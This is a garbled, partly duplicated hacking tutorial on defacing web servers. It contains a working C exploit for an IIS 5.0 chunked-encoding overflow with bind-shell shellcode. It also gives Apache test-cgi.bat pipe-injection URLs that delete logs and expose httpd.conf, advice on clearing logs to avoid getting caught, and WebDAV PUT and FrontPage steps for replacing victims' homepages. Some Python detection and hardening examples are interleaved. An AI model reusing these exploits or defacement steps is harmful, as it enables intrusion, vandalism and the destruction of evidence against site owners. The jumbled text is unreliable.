NOTE Read my tutorial on Gathering Information of Remote Host

TIP If you do not want to get busted you must clear the log files

after you break into a web server

CLEARING LOGS

You must clear yoursquore the logs in order to save yourself from

getting busted So you can use cross site scripting vulnerability

to clear the log files You can do by executing the following URL

httpwwwtargetcomcgi-bintest-cgibat|DEL+log

NOTE The above URL can be used in Apache server software

In case of IIS on Windows 2000 you can use the following method

to get a DOS Shell through telnet

The Following code exploits a buffer overflow in IIS 5 on Windows

2000 server and opens port 1111 and binds a shell to it If the

exploit is successful then all you have to do is use telnet to

connect to port 1111 of target and the system is yours

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

        return -1;
    }

    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(webport);
    addr.sin_addr.s_addr = inet_addr(destIP);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        puts("Socket create error");
        return -1;
    }
    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }

    char buff[4096];
    /* Bind-shell payload: builds the strings "kernel32", "wsock32." and "cmd."
       on the stack, resolves the socket functions through two kernel32 addresses
       fixed for this Windows 2000 build, listens on TCP 1111 and pipes cmd.exe
       to the accepted connection. */
    char *shellcode =
        "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
        "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
        "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
        "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
        "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
        "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
        "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
        "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
        "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
        "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
        "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
        "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
        "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
        "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
        "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
        "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
        "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
        "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
        "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
        "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
        "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
        "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
        "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
        "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
        "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
        "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
        "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
        "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
        "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
        "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
        "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
        "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
        "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
        "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
        "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
        "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
        "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
        "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
        "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
        "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
        "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
        "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
        "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
        "\xff\xff\x95\x18\xff\xff\xff";

    char *s1 = "POST ";            /* " HTTP/1.1\r\n" is supplied by the format string */
    char *s2 = "Accept: */*\r\n";
    char *s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
    char *s5 = "Transfer-Encoding: chunked\r\n\r\n";
    char *sc = "0\r\n\r\n\r\n";

    /* 8 KB NOP sled with the shellcode at its end; it is sent as the query string */
    char shellcodebuff[1024 * 8];
    memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1], shellcode, strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff) - 1] = 0;

    /* Chunked body: a 16-byte pad chunk, then two 4-byte chunks (AAAA, BBBB)
       that are overwritten below with srcdata and jmpaddr, then the 0 chunk */
    char sendbuff[1024 * 16];
    memset(sendbuff, 0, 1024 * 16);
    sprintf(sendbuff,
            "%s%s?%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, /*srcdata, jmpaddr,*/ sc);

    /* The length is taken before patching: jmpaddr contains a 0x00 byte that
       would otherwise truncate what strlen() sees */
    int sendlen = strlen(sendbuff);
    *(DWORD *)strstr(sendbuff, "BBBB") = jmpaddr;
    *(DWORD *)strstr(sendbuff, "AAAA") = srcdata;

    result = send(s, sendbuff, sendlen, 0);
    if (result == -1)
    {
        puts("Send shellcode error");
        return -1;
    }

    /* An HTML error page back means the overflow did not land */
    memset(buff, 0, 4096);
    result = recv(s, buff, sizeof(buff), 0);
    if (strstr(buff, "<html>") != NULL)
    {
        shutdown(s, 0);
        closesocket(s);
        puts("Send shellcode error! Try again!");
        return -1;
    }

    shutdown(s, 0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
    puts("If you cannot connect to the host, try running this program again!");
    return 0;
}

IMPLEMENTATION OF THE CODE

To use the C code, compile it with Visual C++ (it uses Winsock and the stdafx.h precompiled header) and run it as exe ip port aspfilepath, for example 127.0.0.1 80 /iisstart.asp. Now you may be wondering what the code actually does. It sends a chunked POST to an .asp page that overflows the ASP ISAPI filter of an unpatched IIS 5.0 on Windows 2000 (the chunked-encoding buffer overrun closed by Microsoft's MS02-018 cumulative patch), and the shellcode then starts cmd.exe listening on TCP port 1111 on the target. So once the exploit works there is a shell bound to port 1111 on the target system; telnet to port 1111 of the target IP and you are connected to a command shell, running with the privileges of the IIS process that hosts asp.dll, without any kind of authentication.

Note that the addresses hard-coded in the exploit are for the Chinese build of Windows 2000 it was tested on. On another language version or service pack the request does not bind the shell but crashes the ASP worker, and the server answers with an HTML error page, which is what the "Send shellcode error" check in the code looks for.

Various Security Measures

Website defacement has become a serious problem for IT (Information Technology) based companies; every day thousands of websites are defaced. Even government websites are defaced, for different reasons, the most common being cyber war: just as there are wars between rival countries in the real world, there are cyber wars in the wired world.

If you want to see an archive of web attacks, visit the following site:

http://defaced.alldas.org

Now some security measures for system administrators:

- First of all, organize your web root into suitable directories: images in an image directory, server-side scripts in their own directory, and so on. The point is that permissions are granted per virtual directory, so write access and execute access can be confined to the directories that actually need them and denied everywhere else. A web root where static pages, scripts and uploads are mixed together is prone to many attacks.

- Be aware of the latest vulnerabilities; visit these sites:

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

- Every web server is vulnerable, but you need not fear: download and apply the latest patch for each vulnerability as soon as it is released.

- Keep a copy of the server logs where an intruder cannot reach them. An attacker who gets a shell will try to delete the local log files (see "Clearing logs" in this tutorial), so forward the logs to a separate host and review them.

- Lastly, you must be able to predict the moves of a malicious cracker or script kiddie. You need to know how a cracker breaks into your site or web server and what the motive behind the attack is; you must think, act and work like a hacker, and take the cracker out at the root.
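Reviewing the logs is only useful if you know what to look for. The following Python is an added example, not part of the original tutorial: it scans constructed IIS 5.0 W3C-extended and Apache access-log lines for the techniques this tutorial describes (WebDAV write methods, PROPFIND listings, a pipe in a cgi-bin path, an oversized query string on a POST to an .asp page, which is the shape of the chunked-encoding exploit, and httpd.conf served from the web root). The log lines, IP addresses and the 2048-byte threshold are made up for the example; the field names are those of the W3C extended format and the common Apache log format.

```python
import re

WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}
LISTING_METHODS = {"PROPFIND", "SEARCH"}
LONG_QUERY = 2048   # bytes; the IIS chunked exploit sends an 8 KB query string (constructed threshold)

# Constructed IIS 5.0 W3C-extended log; the column names come from its #Fields line.
IIS_LOG = (
    "#Software: Microsoft Internet Information Services 5.0\n"
    + "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status\n"
    + "2006-02-17 10:53:00 203.0.113.7 PUT /scripts/probe.txt - 201\n"
    + "2006-02-17 10:54:10 203.0.113.7 PROPFIND /scripts/ - 207\n"
    + "2006-02-17 10:55:31 203.0.113.7 POST /iisstart.asp " + "%90" * 1000 + " 500\n"
    + "2006-02-17 10:56:02 198.51.100.2 GET /default.htm - 200\n"
)

# Constructed Apache common-log lines (raw string: the backslashes are part of the request).
APACHE_LOG = r'''203.0.113.7 - - [17/Feb/2006:10:57:44 +0000] "GET /cgi-bin/test-cgi.bat|copy+conf\httpd.conf+htdocs\httpd.conf HTTP/1.0" 200 0
203.0.113.7 - - [17/Feb/2006:10:58:01 +0000] "GET /httpd.conf HTTP/1.0" 200 9382
198.51.100.2 - - [17/Feb/2006:10:58:30 +0000] "GET /index.html HTTP/1.1" 200 1024
'''

APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')


def parse_iis(text):
    """Yield one record per W3C log line, using the #Fields header for the column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            yield {"ip": row["c-ip"], "method": row["cs-method"], "path": row["cs-uri-stem"],
                   "query": "" if row["cs-uri-query"] == "-" else row["cs-uri-query"],
                   "status": int(row["sc-status"])}


def parse_apache(text):
    """Yield one record per common/combined log line."""
    for line in text.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        yield {"ip": m.group("ip"), "method": m.group("method").upper(), "path": path,
               "query": query, "status": int(m.group("status"))}


def detect(rec):
    """Return a (rule, ip, path) tuple for every rule the record trips."""
    hits = []
    method, path, query = rec["method"], rec["path"], rec["query"]
    low = path.lower()
    if method in WRITE_METHODS:
        hits.append(("write-method", rec["ip"], path))
    if method in LISTING_METHODS:
        hits.append(("webdav-listing", rec["ip"], path))
    if method == "POST" and low.endswith(".asp") and len(query) > LONG_QUERY:
        hits.append(("long-asp-query", rec["ip"], path))
    if "/cgi-bin/" in low and "|" in path:
        hits.append(("cgi-pipe", rec["ip"], path))
    if low.endswith("/httpd.conf"):
        hits.append(("config-in-webroot", rec["ip"], path))
    return hits


def scan(iis_text, apache_text):
    """Run every record from both logs through the rules, in log order."""
    findings = []
    for rec in list(parse_iis(iis_text)) + list(parse_apache(apache_text)):
        findings.extend(detect(rec))
    return findings


if __name__ == "__main__":
    for rule, ip, path in scan(IIS_LOG, APACHE_LOG):
        print(f"{rule:<20} {ip:<15} {path[:60]}")
```

Every finding in the sample comes from the same client address, which is the usual picture: one source probing for write access, listing a directory, then firing the overflow.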

So this completes my tutorial on defacing websites. I hope you have understood the inner workings of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 8: Defacing Website

Microsoft Telnet> open www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com

ECHO "Site defaced by SB" >> index.html

TIP: SB is the acronym of my name, Shubham Bhattacharya. When you are defacing a site you can also use the acronym of your name.

NOTE: ECHO is a command-shell builtin, not an HTTP method. Typed at a web server's port 80 it is only a malformed request, which the server rejects as an unknown method. The line appends to index.html only when it is typed into a command shell already running on the target, such as the cmd.exe the IIS exploit later in this tutorial binds to port 1111, from inside the web root directory.

PROPFIND: PROPFIND is the WebDAV method for reading the properties of a resource. Sent against a directory with a Depth: 1 header it enumerates the directory's members, which is what makes it usable for directory surfing.

NOTE: IIS 5.0 ships with WebDAV enabled; Microsoft provides it as an administrative tool for web authoring and analysis.

Microsoft Telnet> open www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com

PROPFIND / HTTP/1.1
Host: iis-server
Depth: 1
Content-Length: 0

followed by a blank line. A server with WebDAV enabled answers 207 Multi-Status with an XML body naming each member of the directory in a <D:href> element; a server without it answers 403 Forbidden or 501 Not Implemented. (Depth: 1 limits the listing to the directory's immediate children; without it the server may refuse the request or try to walk the whole tree.)

Sidetrack: trying to write into the web root itself will almost certainly get you a 403 Forbidden error, since wwwroot is hardly ever writable for anonymous clients. Subdirectories are a different matter, so you may be wondering how to test the write permission of a particular directory on an IIS server.

To test the write access permission for a particular directory on an IIS server, follow the steps given below:

- To test whether write access is enabled for anonymous web clients, telnet to the web server or the website on port 80 and make the following request:

PUT /scripts/htwasp HTTP/1.1
Host: iis-server
Content-Length: 10 <enter><enter>

Once you make the request, the server should respond with a 100 Continue message:

HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Sun, 17 Feb 2006 10:53:00 GMT

On receiving the above, type 10 letters:

XXXXXXXXXX

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Sun, 17 Feb 2006 10:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

If the server responds with this 201 Created response, then write permission is enabled: the Location header gives the URL of the file that was created. The Allow line shows that DELETE, COPY and MOVE are open on the directory as well, so the test file can be removed afterwards with a DELETE request to the same path. A 403 Forbidden or 405 Method Not Allowed reply means the directory is not writable for anonymous clients.
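The PROPFIND and PUT checks above are easy to script. The following Python is an added example, not code from the tutorial: it builds the OPTIONS, PUT, DELETE and PROPFIND requests, classifies the replies (skipping the interim 100 Continue, checking for 201/204 on the PUT, reading the Allow header, and pulling the <D:href> entries out of a 207 Multi-Status body), and cleans up the marker file. The responses it runs against are constructed to match the IIS 5.0 replies quoted in the text; `fake_transport`, the host name iis-server and the file name probe.txt are assumptions for the example, and a real socket can be substituted for the transport callable.

```python
import xml.etree.ElementTree as ET

RISKY_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPFIND", "PROPPATCH",
                 "SEARCH", "LOCK", "UNLOCK"}


def build_request(method, path, host, headers=None, body=b""):
    """Serialize one HTTP/1.1 request. Content-Length is always sent, which is what
    makes the server answer 100 Continue and then wait for exactly that many bytes."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}", f"Content-Length: {len(body)}"]
    lines += [f"{k}: {v}" for k, v in (headers or {}).items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def parse_response(raw):
    """Return (status, headers, body); an interim '100 Continue' block is skipped."""
    while True:
        head, _, rest = raw.partition(b"\r\n\r\n")
        if not head:
            raise ValueError("empty response")
        status_line, *header_lines = head.decode(errors="replace").split("\r\n")
        status = int(status_line.split()[1])
        if status != 100:
            break
        raw = rest
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, rest


def allowed_methods(options_response):
    """The risky WebDAV/write methods the server advertises in its Allow: header."""
    _, headers, _ = parse_response(options_response)
    allow = {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}
    return sorted(allow & RISKY_METHODS)


def writable(put_response):
    """201 Created (new file) or 204 No Content (overwritten) means the PUT landed."""
    return parse_response(put_response)[0] in (201, 204)


def propfind_listing(propfind_response):
    """Hrefs from a 207 Multi-Status body; empty when WebDAV is off (403/501)."""
    status, _, body = parse_response(propfind_response)
    if status != 207:
        return []
    return [el.text for el in ET.fromstring(body).iter("{DAV:}href")]


def run_probe(transport, host, directory):
    """Run OPTIONS, PUT (then DELETE the marker) and PROPFIND through `transport`,
    a callable that sends request bytes and returns the raw response bytes."""
    marker = directory.rstrip("/") + "/probe.txt"
    result = {"risky_methods": allowed_methods(transport(build_request("OPTIONS", directory, host)))}
    result["writable"] = writable(transport(build_request("PUT", marker, host, body=b"XXXXXXXXXX")))
    if result["writable"]:
        transport(build_request("DELETE", marker, host))       # leave nothing behind
    result["listing"] = propfind_listing(
        transport(build_request("PROPFIND", directory, host, {"Depth": "1"})))
    return result


# Constructed replies, modelled on the IIS 5.0 responses quoted in the text.
SAMPLE_RESPONSES = {
    "OPTIONS": (b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\nAllow: OPTIONS, TRACE, GET, HEAD, "
                b"DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK\r\n"
                b"Content-Length: 0\r\n\r\n"),
    "PUT": (b"HTTP/1.1 100 Continue\r\nServer: Microsoft-IIS/5.0\r\n\r\n"
            b"HTTP/1.1 201 Created\r\nServer: Microsoft-IIS/5.0\r\n"
            b"Location: http://iis-server/scripts/probe.txt\r\nContent-Length: 0\r\n\r\n"),
    "DELETE": b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\nContent-Length: 0\r\n\r\n",
    "PROPFIND": (b"HTTP/1.1 207 Multi-Status\r\nServer: Microsoft-IIS/5.0\r\nContent-Type: text/xml\r\n\r\n"
                 b'<?xml version="1.0"?><D:multistatus xmlns:D="DAV:">'
                 b"<D:response><D:href>/scripts/</D:href></D:response>"
                 b"<D:response><D:href>/scripts/probe.txt</D:href></D:response></D:multistatus>"),
}


def fake_transport(request):
    """Offline stand-in for a socket: answers by request method."""
    return SAMPLE_RESPONSES[request.split(b" ", 1)[0].decode()]


if __name__ == "__main__":
    print(run_probe(fake_transport, "iis-server", "/scripts/"))
```

The probe writes a marker and deletes it again rather than leaving a file behind; if DELETE is not in the Allow list, skip the PUT step entirely, because a file you cannot remove is itself a defacement.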

EXECUTION ACCESS

Server-side pages such as ASP, PHP and JSP, and ISAPI DLLs, are used in advanced database-driven dynamic websites: they generate the HTML dynamically and send it to the client (web browser). These server-side pages and other executables, including DLL and EXE files, need execute permission on the virtual directory in which they are kept.

NOTE: Keep everything that needs execute permission (DLLs, EXEs and scripts) in a single virtual directory, so that execute permission can be denied everywhere else. A directory that is both writable and executable lets anyone who can upload a file run it on the server.

DIRECTORY SURFING

It is often seen that web servers, or more specifically the virtual directories of web servers, are configured to provide directory browsing to all clients, or to particular clients after authentication. Directory browsing means that the server lists the files and folders present in a virtual directory, just as you see them on your own machine, whenever a directory without a default document is requested. Most web server administrators turn this feature off, but exploits can still be used to obtain a directory listing of a virtual directory: the PROPFIND request above on IIS, or the Apache flaw described next.

EXPLOIT FOR DIRECTORY LISTING IN APACHE

If you are not familiar with Apache, here is a brief description. Apache is a server that you configure with directives in a text file rather than through a GUI. These directives are kept in the httpd.conf file, which lives in c:\apache group\apache\conf in a default Apache installation on a Windows system. This file contains all the settings of the web server, and if we get our hands on it we learn all of them, including the location of the log files, directory permissions, write access, authentication levels and so on.

So let's get on with the exploit. As we know, Apache is the most widely used web server. Apache for Windows ships with a batch file in its cgi-bin directory named test-cgi.bat, whose purpose is to test that CGI execution works in the cgi-bin directory.

NOTE: The cgi-bin directory holds the CGI and Perl scripts.

It is obvious that the cgi-bin virtual directory has execute permission, and that is the condition this attack abuses. To run a .bat CGI, Apache for Windows hands the script path to the command interpreter (cmd.exe), and the vulnerable versions did so without escaping the path. A | (pipe) character in the URL therefore reaches the shell, and whatever follows it is executed as a second command on the remote server.

NOTE: If you don't know how to type the | (pipe) character: on a US keyboard it is Shift+\, and the \ key sits just beside Backspace.

So the attack URL will be like this:

http://www.target.com/cgi-bin/test-cgi.bat|copy+conf\httpd.conf+htdocs\httpd.conf

(The + signs are how spaces are written in a URL.) Through the above URL I have copied the httpd.conf file from the conf directory into htdocs. The conf directory is outside the Apache web root, that is the htdocs folder, so it cannot be read over the web; the copy, however, sits in the web root, and we can now download it with the following URL:

http://target.com/httpd.conf

Through this method you get the httpd.conf file, and from it some worthwhile information about the web server. The same pipe can run any other command, for example dir to list directories, which is the directory listing the heading refers to.
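The flaw is a plain command injection: the script path is built into a command line and handed to a shell, which treats | as its own operator. The following Python is an added example, not code from the tutorial or from Apache, reproducing that dispatch pattern beside its hardened form. It uses /bin/sh as a stand-in for cmd.exe and a throw-away cgi-bin directory holding one constructed script; `dispatch_unsafe`, `dispatch_safe` and `make_cgi_dir` are names chosen for the example.

```python
import os
import re
import subprocess
import tempfile

SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")   # a bare file name: no separators, no shell metacharacters
INTERPRETER = "/bin/sh"                        # stands in for cmd.exe, which runs .bat CGIs on Windows


def make_cgi_dir():
    """Create a throw-away cgi-bin holding one constructed script, like test-cgi.bat."""
    cgi_dir = tempfile.mkdtemp(prefix="cgi-bin-")
    with open(os.path.join(cgi_dir, "test-cgi"), "w") as f:
        f.write("echo test-cgi ran\n")
    return cgi_dir


def dispatch_unsafe(cgi_dir, script_name):
    """Vulnerable pattern: build one command line '<interpreter> <path>' and let a
    shell parse it. A '|' in the name ends the script's command line and starts
    a second command, exactly as in the test-cgi.bat attack URL."""
    cmdline = f"{INTERPRETER} {os.path.join(cgi_dir, script_name)}"
    return subprocess.run(cmdline, shell=True, capture_output=True, text=True).stdout


def dispatch_safe(cgi_dir, script_name):
    """Hardened: accept only a plain file name that exists in cgi-bin, and pass it
    as a single argv element with no shell, so it can never be re-parsed."""
    if not SAFE_NAME.fullmatch(script_name):
        raise ValueError(f"rejected script name {script_name!r}")
    path = os.path.join(cgi_dir, script_name)
    if not os.path.isfile(path):
        raise FileNotFoundError(path)
    return subprocess.run([INTERPRETER, path], shell=False, capture_output=True, text=True).stdout


if __name__ == "__main__":
    cgi = make_cgi_dir()
    print(dispatch_unsafe(cgi, "test-cgi|echo INJECTED"), end="")   # prints INJECTED
    try:
        dispatch_safe(cgi, "test-cgi|echo INJECTED")
    except ValueError as err:
        print(err)
```

The name check also rejects path separators, so ../ tricks fail for the same reason the pipe does; since the path is always joined onto the cgi-bin directory, a name beginning with - can never be taken as an interpreter option either.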

Inspecting known vulnerabilities

Generally websites are defaced and hacked using vulnerabilities in the server software or in the operating system running the server software. Most 'hackers' deface websites using vulnerabilities; please note I am talking about hackers, not script kiddies who deface websites using point-and-click tools. So you must know what a vulnerability is; if you don't, let me tell you: a vulnerability is an existing flaw or defect in software which allows a hacker or cracker to take control of the system or issue arbitrary commands to the server. Every piece of software, application or tool has vulnerabilities.

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

The above sites carry the latest vulnerabilities together with exploit code. Even if you are an elite or a professional, you will find the information useful.

Working with Exploits

I must say this is the most exciting part of this tutorial. Okay, so www.victim.com is the target site. Through the methods I explained earlier in the tutorial we have found out that the website runs on Microsoft IIS. So it is time to find a vulnerability; I use the Acunetix web vulnerability scanner to scan for them. You must know a programming language such as Perl or C, and socket programming; this is essential, because it lets you compile, read and adapt the exploits. Once you have found a vulnerability, try exploiting it: where the exploit is a URL, execute it from your client (browser); otherwise compile and run it.

MICROSOFT FRONTPAGE EXTENSIONS EXPLOIT

This is one of the methods of website defacement using the Microsoft Web Publishing Wizard. Using this method one can deface websites that have FrontPage Server Extensions installed: the Web Publishing Wizard can replace pages on a FrontPage-extended web.

Follow the steps given below to execute the exploit.

Telnet to the target website or web server on port 80:

C:\>telnet www.victim.com 80

You will get a blank screen; type GET and keep pressing Enter until the web server responds to your request:

GET <ENTER><ENTER>

NOTE: Web servers running on IIS have FrontPage Server Extensions enabled by default.

After pressing Enter you will get the following:

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Thu, 17 Feb 2006 04:18:45 GMT
Content-Type: text/html
Content-Length: 87

Once you get the 400 Bad Request (the Server header confirms it is IIS), you have to search for the homepage. Most sites have the default homepage at one of:

http://www.victimserver.com/main.asp
http://www.victimserver.com/index.html
http://www.victimserver.com/index.htm
http://www.victimserver.com/index.asp
http://www.victimserver.com/main.htm
http://www.victimserver.com/default.htm
http://www.victimserver.com/default.asp
http://www.victimserver.com/default.html

Keep trying all the likely file names and extensions until the page loads; if a file does not exist the server gives a 404 error.

Let us say you have found the homepage as www.victim.com/index.html. Design the page you want to upload, or modify the homepage; since the homepage here is index.html, save your page as index.html.

Now open the Web Publishing Wizard and follow the steps given below:

- Open Microsoft Web Publishing Wizard.

- Browse to the file that you are going to upload; here index.html is the file we are going to upload.

- You now get a screen where you have to name the web server; type anything and click Advanced.

- Select the service provider from the drop-down box; this is simply the kind of upload it is going to do. Since your motive is to deface the site, select the FrontPage Extended Web option: this method of defacing works only for FrontPage-enabled sites.

- Type the URL of the victim server's homepage in the box given; here it is www.victim.com/index.html.

- Here specify the URL that you type in the web browser to access the victim server's website.

- Select the connection method that you use to access the internet.

- Click Finish. Voila, you have successfully replaced the victim's homepage with yours.

NOTE: This only works where the FrontPage authoring permissions are misconfigured. A correctly configured FrontPage-extended web prompts the wizard for author credentials and refuses anonymous uploads, so on a properly set-up server the last step fails with an access-denied error.

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know something about exploit code. I am going to present an exploit written in the most powerful programming language, C.

/*
 * Windows 2000 Server Exploit By CHINANSL Security Team
 * Test on Windows 2000 Chinese Version, IIS 5.0, not patched
 * Warning: THIS PROGRAM WILL ONLY TEST!
 * CHINANSL Technology CO., LTD   http://www.chinansl.com
 * keji@chinansl.com
 * use MS VC++ to compile this piece of code
 */
#include "stdafx.h"      /* VC++ precompiled header; drop it outside a VC++ project */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>     /* Winsock declarations (SOCKET, WSAStartup, ...) */
#pragma comment (lib, "Ws2_32")

int main(int argc, char *argv[])
{
    if (argc != 4)
    {
        printf("%s ip port aspfilepath\n\n", argv[0]);
        printf(" ie: %s 127.0.0.1 80 /iisstart.asp\n", argv[0]);
        puts(" programed by keji@chinansl.com");
        return 0;
    }

